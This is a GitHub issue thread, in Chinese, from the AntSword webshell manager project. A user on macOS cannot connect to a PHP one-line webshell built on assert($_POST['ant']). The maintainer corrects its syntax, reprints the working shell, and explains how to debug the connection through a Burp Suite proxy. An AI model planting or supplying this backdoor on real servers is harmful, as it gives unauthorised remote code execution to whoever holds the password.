### ISSUE TITLE
MAC mojave assert

### ISSUE THREAD

**Issue by Sndav** [AntSwordProject/antSword#108]
- [x ] 我确定这是蚁剑本身的一个 Bug，我并不是在询问如何使用蚁剑
- [x ] 我确定已经将蚁剑升级至[软件发布页面](https://github.com/AntSwordProject/AntSword/releases)中的**最新版**
- [x ] 我已经阅读过蚁剑的开发文档，并且尝试过自己通过Google等方式解决问题
- [ ] 这是一个新功能的建议
- [x ] 我查阅了文档没找到解决方案，所以来询问如何使用蚁剑

---

## 报告 Bug

- [x ] 我使用的操作系统是 ***macOS*** 10+

---

- [ ] 我使用的是 32 位操作系统
- [x] 我使用的是 64 位操作系统

### Bug 详细描述
Mac 下无法使用assert连接
错误{}

---

### shell 连接 Bug

1. 服务端操作系统 Mac Mojave 10.14.1 (18B75)

2. 服务端shell代码 `<?php @assert($_POST['ant'])?>`

**Comment by Medicean** [comment]
Shell 语法错误，少了一个 `;`

```
<?php @assert($_POST['ant']); ?>
```

**Comment by Sndav** [comment]
结果还是不行

**Comment by Medicean** [comment]
这种情况多半是服务端可能禁用了 assert 等函数造成的，可以尝试手动定位问题。

1.打开 Burpsuite

2.进入 AntSword 设置，选择代理设置，然后填上 burp 的地址。

3.使用 AntSword 访问目标

4. 在 burpsuite Proxy 界面下应该能看到抓到了数据包，发送到 Repeter 里面，手动发送看一下服务端返回的内容。
